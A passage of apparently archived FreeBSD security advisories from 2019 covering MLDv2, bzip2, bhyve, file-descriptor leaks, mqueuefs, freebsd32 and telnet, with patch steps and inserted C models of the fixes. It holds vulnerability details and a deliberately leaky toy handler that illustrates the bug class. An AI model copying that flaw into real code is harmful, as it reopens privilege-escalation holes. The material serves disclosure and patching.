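The handling that this advisory and SA-19:22.mbuf above both describe (a query split across mbufs here, a non-contiguous m_pulldown(9) result there) comes down to never assuming a header is contiguous in one mbuf. The following C model is written for this page and is not FreeBSD kernel code: the toy chain (struct tmbuf, tm_chain_len, tm_copydata), the parser (mld_query_nsrc) and the driver (demo_split_query) are constructed names; the only facts taken from elsewhere are the MLDv2 Listener Query field offsets from RFC 3810 section 5.1.

```c
/* Added example for this page: a toy mbuf chain whose copy routine
 * checks total length before reading, and an MLDv2 query parser built
 * on it.  Not FreeBSD kernel code. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Toy mbuf: a chain of buffers that together hold one packet. */
struct tmbuf {
	const uint8_t *data;	/* this mbuf's bytes */
	size_t len;		/* how many of them */
	struct tmbuf *next;	/* next mbuf in the chain, or NULL */
};

/* Total bytes across the whole chain. */
size_t
tm_chain_len(const struct tmbuf *m)
{
	size_t total = 0;

	for (; m != NULL; m = m->next)
		total += m->len;
	return total;
}

/* Copy `len` bytes at chain offset `off` into `dst`, crossing mbuf
 * boundaries as needed; returns -1 if the chain is shorter than off+len.
 * The check runs before any byte is read, so a packet that claims more
 * data than it carries is refused rather than over-read. */
int
tm_copydata(const struct tmbuf *m, size_t off, size_t len, uint8_t *dst)
{
	size_t total = tm_chain_len(m);

	if (len > total || off > total - len)
		return -1;
	while (len > 0) {
		if (off >= m->len) {	/* this mbuf ends before `off` */
			off -= m->len;
			m = m->next;
			continue;
		}
		size_t n = m->len - off;
		if (n > len)
			n = len;
		memcpy(dst, m->data + off, n);
		dst += n;
		len -= n;
		off = 0;
		m = m->next;
	}
	return 0;
}

/* MLDv2 Listener Query layout (RFC 3810, section 5.1). */
#define MLD_QUERY_MINLEN	28	/* fixed part, through Number of Sources */
#define MLD_NSRC_OFF		26	/* 16-bit Number of Sources field */
#define MLD_SRC_LEN		16	/* one IPv6 source address */
#define MLD_LISTENER_QUERY	130	/* ICMPv6 type */

/* Validate a Listener Query in `m` and return the number of source
 * addresses it declares, or -1 if the chain does not really contain the
 * bytes the header claims.  The header is fetched with tm_copydata(), so
 * it may be split across mbufs at any byte without being misread. */
int
mld_query_nsrc(const struct tmbuf *m)
{
	uint8_t hdr[MLD_QUERY_MINLEN];

	if (tm_copydata(m, 0, sizeof(hdr), hdr) != 0)
		return -1;		/* chain shorter than the fixed header */
	if (hdr[0] != MLD_LISTENER_QUERY)
		return -1;
	unsigned nsrc = ((unsigned)hdr[MLD_NSRC_OFF] << 8) | hdr[MLD_NSRC_OFF + 1];
	/* every declared source address must actually be present */
	if (tm_chain_len(m) - MLD_QUERY_MINLEN < (size_t)nsrc * MLD_SRC_LEN)
		return -1;
	return (int)nsrc;
}

/* Constructed packet: a query declaring `declared` sources while carrying
 * `present` (at most 8), split into two mbufs at byte 16 so the fixed
 * header itself straddles the boundary.  Returns mld_query_nsrc()'s verdict. */
int
demo_split_query(unsigned declared, unsigned present)
{
	uint8_t buf[MLD_QUERY_MINLEN + 8 * MLD_SRC_LEN];
	struct tmbuf m[2];
	size_t total = MLD_QUERY_MINLEN + present * MLD_SRC_LEN;

	if (present > 8)
		return -2;
	memset(buf, 0, sizeof(buf));
	buf[0] = MLD_LISTENER_QUERY;
	buf[MLD_NSRC_OFF] = (uint8_t)(declared >> 8);
	buf[MLD_NSRC_OFF + 1] = (uint8_t)declared;
	m[0].data = buf;      m[0].len = 16;         m[0].next = &m[1];
	m[1].data = buf + 16; m[1].len = total - 16; m[1].next = NULL;
	return mld_query_nsrc(m);
}
```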

III. Impact

A remote attacker may be able to cause an out-of-bounds read or write that
may cause the kernel to attempt to access an unmapped page and subsequently
panic.

IV.  Workaround

No workaround is available.  Systems not using IPv6 are not affected.

V.   Solution

Perform one of the following:

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Reboot for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2, FreeBSD 11.3]
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.11.patch.asc
# gpg --verify mldv2.11.patch.asc

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.12.patch.asc
# gpg --verify mldv2.12.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r350648
releng/12.0/  r350644
stable/11/r350650
releng/11.3/  r350644
releng/11.2/  r350644
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5608>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:19.mldv2.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:18.bzip2

2019-08-06 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:18.bzip2  Security Advisory
  The FreeBSD Project

Topic:  Multiple vulnerabilities in bzip2

Category:   contrib
Module: bzip2
Announced:  2019-08-06
Affects:All supported versions of FreeBSD.
Corrected:  2019-07-04 07:29:18 UTC (stable/12, 12.0-STABLE)
2019-08-06 17:09:47 UTC (releng/12.0, 12.0-RELEASE-p9)
2019-07-04 07:32:25 UTC (stable/11, 11.3-STABLE)
2019-08-06 17:09:47 UTC (releng/11.3, 11.3-RELEASE-p2)
2019-08-06 17:09:47 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:   CVE-2016-3189, CVE-2019-12900

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The bzip2(1)/bunzip2(1) utilities and the libbz2 library compress and
decompress files using an algorithm based on the Burrows-Wheeler transform.
They are generally slower than Lempel-Ziv compressors such as gzip, but
usually provide a greater compression ratio.

The bzip2recover utility extracts blocks from a damaged bzip2(1) file,
permitting partial recovery of the contents of the file.

II.  Problem Description

The decompressor used in bzip2 contains a bug which can lead to an
out-of-bounds write when processing a specially crafted bzip2(1) file.

bzip2recover contains a heap use-after-free bug which can be triggered
when processing a specially crafted bzip2(1) file.

III. Impact

An attacker who can cause maliciously crafted input to be processed
may trigger either of these bugs.  The bzip2recover bug may cause a
crash, permitting a denial-of-service.  The bzip2 decompressor bug
could potentially be exploited to execute arbitrary code.

Note that some utilities, including the tar(1) archiver and the bspatch(1)
binary patching utility (used in portsnap(8) and freebsd-update(8))
decompress bzip2(1)-compressed data internally; system administrators should
assume that their systems will at some point decompress bzip2(1)-compressed
data even if they never explicitly invoke the bunzip2(1) utility.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and restart daemons if necessary.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:18/bzip2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:18/bzip2.patch.asc
# gpg --verify bzip2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r349717
releng/12.0/  r350643
stable/11/r349718
releng/11.3/  r350643
releng/11.2/  r350643
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3189>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12900>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:18.bzip2.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:16.bhyve

2019-07-24 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:16.bhyve  Security Advisory
  The FreeBSD Project

Topic:  Bhyve out-of-bounds read in XHCI device

Category:   core
Module: bhyve
Announced:  2019-07-24
Credits:Reno Robert
Affects:All supported versions of FreeBSD.
Corrected:  2019-07-23 17:48:37 UTC (stable/12, 12.0-STABLE)
2019-07-24 12:56:06 UTC (releng/12.0, 12.0-RELEASE-p8)
2019-07-23 17:48:37 UTC (stable/11, 11.2-STABLE)
2019-07-24 12:56:06 UTC (releng/11.2, 11.2-RELEASE-p12)
2019-07-24 12:56:06 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:   CVE-2019-5604

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

bhyve(8) is a hypervisor that supports running a variety of virtual
machines (guests).  bhyve includes an emulated XHCI device.

II.  Problem Description

The pci_xhci_device_doorbell() function does not validate the 'epid' and
'streamid' provided by the guest, leading to an out-of-bounds read.
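This advisory and SA-19:21.bhyve above share one defensive shape: a guest-supplied value must be validated before it sizes a buffer (the TSO header case) or indexes a table (the 'epid'/'streamid' case). The following C model is written for this page and is not bhyve code; the limits (TSO_HDR_MAX, XHCI_MAX_EP, XHCI_MAX_STREAMS), the structures and the function names are constructed for the example.

```c
/* Added example for this page: two device-model entry points that take
 * guest-controlled values and check them before use.  Not bhyve code;
 * all limits and names are chosen for the example. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* ---- TSO header assembly: the SA-19:21 (e1000) shape ---- */

/* Largest L2+L3+L4 header this model will assemble.  Chosen for the
 * example; the guest cannot enlarge it. */
#define TSO_HDR_MAX	128

/*
 * Copy the per-segment header of `pkt` into `out`, using a fixed-size
 * stack scratch buffer.  `guest_hdrlen` comes straight from the guest's
 * transmit descriptor and is checked against BOTH the scratch buffer and
 * the packet before it is used.  Returns the header length, or -1 when
 * the guest value is rejected.
 */
int
tso_build_header(const uint8_t *pkt, size_t pktlen, unsigned guest_hdrlen,
    uint8_t *out, size_t outsz)
{
	uint8_t hdr[TSO_HDR_MAX];	/* fixed size: never sized by guest data */

	if (guest_hdrlen == 0 || guest_hdrlen > sizeof(hdr))
		return -1;		/* would overflow the scratch buffer */
	if (guest_hdrlen > pktlen || guest_hdrlen > outsz)
		return -1;		/* would over-read pkt or over-write out */
	memcpy(hdr, pkt, guest_hdrlen);
	/* checksum and VLAN edits on hdr[] would happen here */
	memcpy(out, hdr, guest_hdrlen);
	return (int)guest_hdrlen;
}

/* Constructed driver: a 200-byte filler packet with a guest header length. */
int
demo_tso(unsigned guest_hdrlen, size_t pktlen)
{
	uint8_t pkt[200], out[TSO_HDR_MAX];

	if (pktlen > sizeof(pkt))
		return -2;
	memset(pkt, 0xab, sizeof(pkt));
	return tso_build_header(pkt, pktlen, guest_hdrlen, out, sizeof(out));
}

/* ---- Doorbell register: the SA-19:16 (XHCI) shape ---- */

#define XHCI_MAX_EP		32	/* endpoints per device slot */
#define XHCI_MAX_STREAMS	16	/* stream contexts per endpoint in this model */

struct ep_state {
	unsigned nstreams;			/* streams configured, <= XHCI_MAX_STREAMS */
	unsigned ring_head[XHCI_MAX_STREAMS];	/* per-stream ring position */
};

struct dev_state {
	struct ep_state ep[XHCI_MAX_EP];
};

/*
 * Handle a doorbell write for endpoint `epid`, stream `streamid`.  Both
 * values are guest-controlled; each is bounds-checked against the table
 * it indexes before any memory is touched.  Returns 0 if rung, -1 if
 * either index is out of range.
 */
int
xhci_doorbell(struct dev_state *dev, uint32_t epid, uint32_t streamid)
{
	struct ep_state *ep;

	if (epid >= XHCI_MAX_EP)
		return -1;			/* past the endpoint table */
	ep = &dev->ep[epid];
	if (streamid >= ep->nstreams || streamid >= XHCI_MAX_STREAMS)
		return -1;			/* stream not configured on this endpoint */
	ep->ring_head[streamid]++;
	return 0;
}

/* Constructed driver: endpoint 1 has 4 streams, all others none. */
int
demo_doorbell(uint32_t epid, uint32_t streamid)
{
	struct dev_state dev;

	memset(&dev, 0, sizeof(dev));
	dev.ep[1].nstreams = 4;
	return xhci_doorbell(&dev, epid, streamid);
}
```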

III. Impact

A misbehaving bhyve guest could crash the system or access memory that
it should not be able to.

IV.  Workaround

No workaround is available; however, systems not using bhyve(8) for
virtualization are not vulnerable.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

No reboot is required.  Rather, the bhyve(8) process for vulnerable virtual
machines should be restarted.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Restart any bhyve virtual machines or reboot the system.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:16/bhyve.patch
# fetch https://security.FreeBSD.org/patches/SA-19:16/bhyve.patch.asc
# gpg --verify bhyve.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.

Restart any bhyve virtual machines, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r350246
releng/12.0/  r350285
stable/11/r350247
releng/11.2/  r350285
releng/11.3/  r350285
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5604>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:16.bhyve.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:17.fd

2019-07-24 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:17.fd Security Advisory
  The FreeBSD Project

Topic:  File description reference count leak

Category:   core
Module: unix
Announced:  2019-07-24
Credits:Mark Johnston
Affects:All supported versions of FreeBSD.
Corrected:  2019-07-22 19:25:05 UTC (stable/12, 12.0-STABLE)
2019-07-24 12:57:49 UTC (releng/12.0, 12.0-RELEASE-p8)
2019-07-22 19:27:23 UTC (stable/11, 11.2-STABLE)
2019-07-24 12:57:49 UTC (releng/11.2, 11.2-RELEASE-p12)
2019-07-24 12:57:49 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:   CVE-2019-5607

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

UNIX-domain sockets are used for inter-process communication.  It is
possible to use UNIX-domain sockets to transfer rights, encoded as file
descriptors, to another process.  Rights are encapsulated in control
messages, and multiple such messages may be transmitted with a single
system call.

II.  Problem Description

If a process attempts to transmit rights over a UNIX-domain socket and
an error causes the attempt to fail, references acquired on the rights
are not released and are leaked.  This bug can be used to cause the
reference counter to wrap around and free the corresponding file
structure.
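This advisory and SA-19:24.mqueuefs above describe the same bug class: a reference taken on a struct file that an error path forgets to release, until the counter wraps and the structure is freed while still in use. The following C model is written for this page and is not FreeBSD code; struct tfile, tfile_hold, tfile_drop, op_buggy, op_fixed, leaked_after and hold_at_limit are constructed names. It shows the leak, the single-exit fix, and an acquire that refuses to wrap.

```c
/* Added example for this page: a toy file object with a 32-bit reference
 * count, one handler that leaks a reference on its error path and one
 * that does not.  Not FreeBSD kernel code. */
#include <stdbool.h>
#include <stdint.h>

/* Toy `struct file`: shared by every descriptor that refers to it. */
struct tfile {
	uint32_t refcnt;	/* descriptors plus in-flight syscalls holding it */
	bool freed;		/* set once the last reference is dropped */
};

/*
 * fget()-style acquire.  Refuses to hand out a reference if the object
 * is already gone or the counter would wrap; a wrapped counter is what
 * turns a leak into a use-after-free.
 */
int
tfile_hold(struct tfile *fp)
{
	if (fp->freed || fp->refcnt == UINT32_MAX)
		return -1;
	fp->refcnt++;
	return 0;
}

/* fdrop()-style release: frees the object when the last reference goes. */
void
tfile_drop(struct tfile *fp)
{
	if (fp->refcnt == 0 || fp->freed)
		return;			/* already released: nothing to drop */
	if (--fp->refcnt == 0)
		fp->freed = true;
}

/*
 * Buggy handler: takes a reference, then bails out on a validation
 * error without giving it back.  Each failing call leaves the counter
 * one higher than before.
 */
int
op_buggy(struct tfile *fp, int arg)
{
	if (tfile_hold(fp) != 0)
		return -1;
	if (arg < 0)
		return -1;		/* BUG: reference leaked on this path */
	/* ... work on fp ... */
	tfile_drop(fp);
	return 0;
}

/* Fixed handler: every exit after the hold goes through the drop. */
int
op_fixed(struct tfile *fp, int arg)
{
	int error = 0;

	if (tfile_hold(fp) != 0)
		return -1;
	if (arg < 0)
		error = -1;
	else {
		/* ... work on fp ... */
	}
	tfile_drop(fp);			/* single exit: always released */
	return error;
}

/*
 * Run a handler `calls` times with an argument that always fails and
 * return how many references are left beyond the descriptor's own.
 * A correct handler leaves 0; the buggy one leaves `calls`.
 */
uint32_t
leaked_after(int (*op)(struct tfile *, int), unsigned calls)
{
	struct tfile f = { .refcnt = 1, .freed = false };	/* one open descriptor */

	for (unsigned i = 0; i < calls; i++)
		(void)op(&f, -1);
	return f.refcnt - 1;
}

/* What the acquire path does once a leak has driven the counter to its limit. */
int
hold_at_limit(void)
{
	struct tfile f = { .refcnt = UINT32_MAX, .freed = false };

	return tfile_hold(&f);		/* -1: refused rather than wrapped to 0 */
}
```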

III. Impact

A local user can exploit the bug to gain root privileges or escape from
a jail.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for a security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.2.patch.asc
# gpg --verify fd.11.2.patch.asc

[FreeBSD 11.3]
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.patch.asc
# gpg --verify fd.11.patch.asc

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.12.patch.asc
# gpg --verify fd.12.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-----------------------------------------------------------------------------
stable/12/                                                        r350222
releng/12.0/                                                      r350286
stable/11/                                                        r350223
releng/11.2/                                                      r350286
releng/11.3/                                                      r350286
-----------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5607>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:17.fd.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:15.mqueuefs

2019-07-24 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:15.mqueuefs                                   Security Advisory
                                                          The FreeBSD Project

Topic:          Reference count overflow in mqueue filesystem

Category:       core
Module:         kernel
Announced:      2019-07-24
Credits:        Mateusz Guzik
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-23 21:12:32 UTC (stable/12, 12.0-STABLE)
                2019-07-24 12:55:16 UTC (releng/12.0, 12.0-RELEASE-p8)
                2019-07-23 21:15:28 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:55:16 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:55:16 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-5603

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

mqueuefs(5) implements the POSIX message queue file system, which processes
can use as a communication mechanism.

'struct file' represents open files, directories, sockets and other
entities.

II.  Problem Description

System calls operating on file descriptors obtain a reference to the
relevant struct file.  Due to a programming error, that reference was not
always released, which in turn could be used to overflow the reference
counter of the affected struct file.

III. Impact

A local user can use this flaw to obtain access to files, directories,
sockets etc. opened by processes owned by other users.  If the obtained
struct file represents a directory outside the user's jail, it can be used
to access files outside the jail.  If the user in question is a jailed
root, they can obtain root privileges on the host system.

IV.  Workaround

No workaround is available.  Note that the mqueuefs file system is not
enabled by default.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:15/mqueuefs.patch
# fetch https://security.FreeBSD.org/patches/SA-19:15/mqueuefs.patch.asc
# gpg --verify mqueuefs.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-----------------------------------------------------------------------------
stable/12/                                                        r350261
releng/12.0/                                                      r350284
stable/11/                                                        r350263
releng/11.2/                                                      r350284
releng/11.3/                                                      r350284
-----------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5603>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:15.mqueuefs.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:14.freebsd32

2019-07-24 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:14.freebsd32                                  Security Advisory
                                                          The FreeBSD Project

Topic:          Kernel memory disclosure in freebsd32_ioctl

Category:       core
Module:         kernel
Announced:      2019-07-24
Credits:        Ilja van Sprundel, IOActive
Affects:        FreeBSD 11.2 and FreeBSD 11.3
Corrected:      2019-07-22 18:14:34 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:54:10 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:54:10 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-5605

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The FreeBSD kernel supports executing 32-bit applications on a 64-bit
kernel, including the ioctl(2) interface.

II.  Problem Description

Due to insufficient initialization of memory copied to userland in the
components listed above, small amounts of kernel memory may be disclosed
to userland processes.

III. Impact

A user who can invoke 32-bit FreeBSD ioctls may be able to read the
contents of small portions of kernel memory.

Such memory might contain sensitive information, such as portions of the
file cache or terminal buffers.  This information might be directly
useful, or it might be leveraged to obtain elevated privileges in some
way; for example, a terminal buffer might include a user-entered
password.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:14/freebsd32.patch
# fetch https://security.FreeBSD.org/patches/SA-19:14/freebsd32.patch.asc
# gpg --verify freebsd32.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-----------------------------------------------------------------------------
stable/11/                                                        r350217
releng/11.2/                                                      r350283
releng/11.3/                                                      r350283
-----------------------------------------------------------------------------

Note: This issue was addressed in a different way prior to the branch point
for stable/12. As such, no patch is needed for FreeBSD 12.x.

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5605>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:14.freebsd32.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:12.telnet

2019-07-24 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:12.telnet                                     Security Advisory
                                                          The FreeBSD Project

Topic:          telnet(1) client multiple vulnerabilities

Category:       contrib
Module:         contrib/telnet
Announced:      2019-07-24
Credits:        Juniper Networks
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-19 15:37:29 UTC (stable/12, 12.0-STABLE)
                2019-07-24 12:51:52 UTC (releng/12.0, 12.0-RELEASE-p8)
                2019-07-19 15:27:53 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:51:52 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:51:52 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-0053

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The telnet(1) command is a TELNET protocol client, used primarily to
establish terminal sessions across a network.

II.  Problem Description

Insufficient validation of environment variables in the telnet client
supplied in FreeBSD can lead to stack-based buffer overflows.  A stack-
based overflow is present in the handling of environment variables when
connecting via the telnet client to remote telnet servers.

This issue only affects the telnet client.  Inbound telnet sessions to
telnetd(8) are not affected by this issue.

III. Impact

These buffer overflows may be triggered when connecting to a malicious
server, or by an active attacker in the network path between the client
and server.  Specially crafted TELNET command sequences may cause the
execution of arbitrary code with the privileges of the user invoking
telnet(1).

IV.  Workaround

Do not use telnet(1) to connect to untrusted machines or over an
untrusted network.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:12/telnet.patch
# fetch https://security.FreeBSD.org/patches/SA-19:12/telnet.patch.asc
# gpg --verify telnet.patch.asc

